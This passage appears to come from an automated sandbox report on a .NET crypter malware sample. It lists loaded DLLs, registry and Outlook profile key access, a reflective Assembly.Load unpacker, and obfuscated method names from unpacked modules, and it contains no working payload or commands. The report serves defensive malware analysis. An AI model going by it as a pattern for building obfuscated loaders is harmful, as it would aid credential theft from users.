Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs	.Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.56a0000.7.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d9fcdc.1.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs	.Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d4f16c.3.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d966c4.0.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d45b54.2.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_01284779 push ebp; retf 0002h	0_2_0128477A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_012847B1 push esi; retf 0002h	0_2_012847B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_01284659 push edx; retf 0002h	0_2_0128465A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_01289771 pushfd ; retf 0002h	0_2_01289772
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_01289CF1 push eax; retf	0_2_01289CF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_052DC080 pushad ; retf	0_2_052DC081
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_078364AA push esp; iretd	0_2_078364B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_078313D3 push 9BDCB805h; retf	0_2_078313E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_0783537A push eax; ret	0_2_0783537D

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: section name: .text entropy: 7.882388794743662

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Rsjwms4Wh8At7jltVf.cs	High entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, hnb1mywmKd17dlbrAS.cs	High entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, LVNaJWsMIVA7LTLASE.cs	High entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, D33N8oUtGVx7cDxPuT.cs	High entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, zQyvpDqyxKTxd6tm0NN.cs	High entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, ksWtZCxKsl0TxRCTo8.cs	High entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, pLwTg0qqY9GrvEoZXIs.cs	High entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs	High entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, lDlgAUP9SyyXYURNLR.cs	High entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, sC7nprRRvT8OJFZjOZ.cs	High entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, fSdvMKZMagrtwMm7Ri.cs	High entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, O9PymkJ3NMlC2399qj.cs	High entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, pBjySHqM5QnwRNWaSBd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, xGB0Wf6bc0bOdc8jTI.cs	High entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, KdpVO0auC752URy1LH.cs	High entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, AnptoFjC7pNu1LqbY6.cs	High entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, qyT5B9fG4eENyHVdsw.cs	High entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, ojeKecA3ycAgUvCgAn.cs	High entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, kIOpWCowqWShKUKAee.cs	High entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, KSQ07YHqchvMXla9N1.cs	High entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Uel8r1lQF2PkteGZrv.cs	High entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.56a0000.7.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d9fcdc.1.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Rsjwms4Wh8At7jltVf.cs	High entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, hnb1mywmKd17dlbrAS.cs	High entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, LVNaJWsMIVA7LTLASE.cs	High entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, D33N8oUtGVx7cDxPuT.cs	High entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, zQyvpDqyxKTxd6tm0NN.cs	High entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, ksWtZCxKsl0TxRCTo8.cs	High entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, pLwTg0qqY9GrvEoZXIs.cs	High entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs	High entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, lDlgAUP9SyyXYURNLR.cs	High entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, sC7nprRRvT8OJFZjOZ.cs	High entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, fSdvMKZMagrtwMm7Ri.cs	High entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, O9PymkJ3NMlC2399qj.cs	High entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, pBjySHqM5QnwRNWaSBd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, xGB0Wf6bc0bOdc8jTI.cs	High entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, KdpVO0auC752URy1LH.cs	High entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, AnptoFjC7pNu1LqbY6.cs	High entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, qyT5B9fG4eENyHVdsw.cs	High entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, ojeKecA3ycAgUvCgAn.cs	High entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, kIOpWCowqWShKUKAee.cs	High entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, KSQ07YHqchvMXla9N1.cs	High entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Uel8r1lQF2PkteGZrv.cs	High entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'
